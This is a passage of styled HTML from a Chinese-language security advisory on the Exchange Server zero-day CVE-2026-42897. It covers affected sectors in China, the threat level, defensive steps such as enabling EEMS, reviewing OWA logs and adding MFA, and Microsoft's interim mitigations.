normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">关联威胁活动</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">据HEAL Security同期监测，APT组织正在全球范围内针对制造业和供应链企业部署名为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">TencShell</span></span></strong><span leaf="">的新型恶意软件。虽然目前没有直接证据表明TencShell与</span><span style="overflow-wrap: break-word;"><span leaf="">CVE-2026-42897</span></span><span leaf="">存在关联，但这种时间线上的巧合值得关注——国家级APT组织通常会优先储备和利用高价值零日漏洞，而Exchange Server作为企业核心通信平台，一直是这类组织的优先目标。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内影响分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">受影响范围</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内使用微软Exchange Server本地部署版本的用户群体主要集中在以下行业：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">大型企业</span></strong><span leaf="">：尤其是外资企业和跨国公司的国内分支机构</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">政府机构</span></strong><span leaf="">：部分党政机关曾使用Exchange作为邮件系统</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">金融机构</span></strong><span leaf="">：银行、证券、保险等行业存在一定部署量</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高校和科研机构</span></strong><span leaf="">：学术邮箱系统常用Exchange架构</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">需要指出的是，近年来国内信创替代进程加速，越来越多的政府机关和关键信息基础设施运营单位已将邮件系统迁移至国产解决方案，这在一定程度上降低了个体风险。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">当前威胁等级</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">对于国内普通企业用户</span></strong><span leaf="">：短期内的直接威胁相对可控，原因包括：该漏洞利用需要发送特制邮件针对性投递、Exchange Server国内部署量呈下降趋势、国内邮箱系统存在额外的安全防护层。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">对于高价值目标</span></strong><span leaf="">：风险等级维持在高水平。APT组织历来重视对Exchange Server漏洞的储备和利用，任何在野0day都可能已被纳入攻击工具库。金融、政府、关键基础设施等行业的Exchange Server用户应视为优先防护对象。</span></p><h3 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">防御建议</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">立即行动（24小时内）</span></strong><span leaf="">：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">确认当前Exchange Server版本，确认是否在受影响范围内</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">检查是否已启用Exchange Emergency Mitigation Service (EEMS)</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">审查OWA访问日志，关注异常的邮件访问行为</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">对Exchange Server管理员账户实施额外的多因素认证</span></span></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">短期措施（1周内）</span></strong><span leaf="">：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">限制OWA的外部访问，仅保留必要的业务通道</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">加强邮件网关的入站检查规则，对异常HTML邮件内容实施过滤</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">向安全运营团队通报该漏洞，要求提高威胁监测级别</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">制定紧急补丁部署计划，一旦微软发布官方修复，立即部署</span></span></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">中长期建议</span></strong><span leaf="">：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">加速Exchange Server向云端Exchange Online或国产邮件系统的迁移</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">建立Exchange Server的持续安全监测机制</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">定期开展邮件系统安全评估和渗透测试</span></span></li></ol><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">微软官方缓解措施</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">微软已发布临时缓解指导，核心措施包括：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Exchange Emergency Mitigation Service (EEMS)</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这是微软为Exchange Server提供的紧急缓解服务，类似于自动化的安全补丁机制。启用EEMS后，当微软推送特定漏洞的缓解规则时，Exchange Server会自动应用这些规则，无需管理员手动干预。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">建议操作步骤</span></strong><span leaf="">：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">确保Exchange Server的EEMS服务处于启用状态</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">检查Windows Server上的Microsoft Exchange Mitigation Service运行状态</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">应用微软建议的URL重写规则，对OWA请求进行过滤</span></span></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">微软表示永久修复补丁正在开发中，但目前无法给出具体时间表。这种&#34;补丁在路上&#34;的状态预计将持续数周，期间组织需要依靠缓解措施和持续监控来降低风险。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">总结与展望</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2026-42897</span></span><span leaf="">的出现再次提醒我们，微软Exchange Server作为企业通信的核心基础设施，其安全性始终是攻防博弈的焦点。该漏洞的高CVSS评分、已确认的野外利用、以及被APT组织青睐的历史传统，共同构成了的威胁态势。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内用户虽然当前面临的紧迫风险相对可控，但不应放松警惕。国家级APT组织对高价值目标的持续关注，意味着任何0day漏洞都可能在某个时刻被&#34;激活&#34;。组织应借此机会重新审视自身的Exchange Server安全态势，加速向更安全的架构迁移，同时保持对类似漏洞情报的持续关注。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">最后提醒，安全是一场持久战，而非遭遇战。保持警惕，持续监测，果断响应，才是应对这类安全事件的正确姿势。</span></p><hr style="overflow-wrap: break-word;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 0.4em;margin: 1.5em 0px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"/><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft 